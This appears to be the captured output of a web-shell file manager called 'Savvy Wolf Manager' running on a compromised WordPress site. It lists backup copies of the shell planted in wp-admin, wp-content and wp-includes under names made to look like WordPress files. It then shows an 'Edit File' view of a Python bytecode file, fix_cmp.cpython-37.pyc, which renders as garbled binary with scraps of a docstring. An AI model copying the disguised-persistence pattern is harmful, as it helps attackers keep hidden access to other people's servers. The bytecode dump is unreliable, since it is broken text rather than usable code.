Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: fix_cmp.cpython-37.pyc
B �A�[� � @ sB d Z ddlmZ ddlmZ ddlmZ dZG dd� dej�Z dS ) z� Fixer for the cmp() function on Py2, which was removed in Py3. Adds this import line:: from past.builtins import cmp if cmp() is called in the code. � )�unicode_literals)� fixer_base)�touch_import_topz name='cmp'c @ s&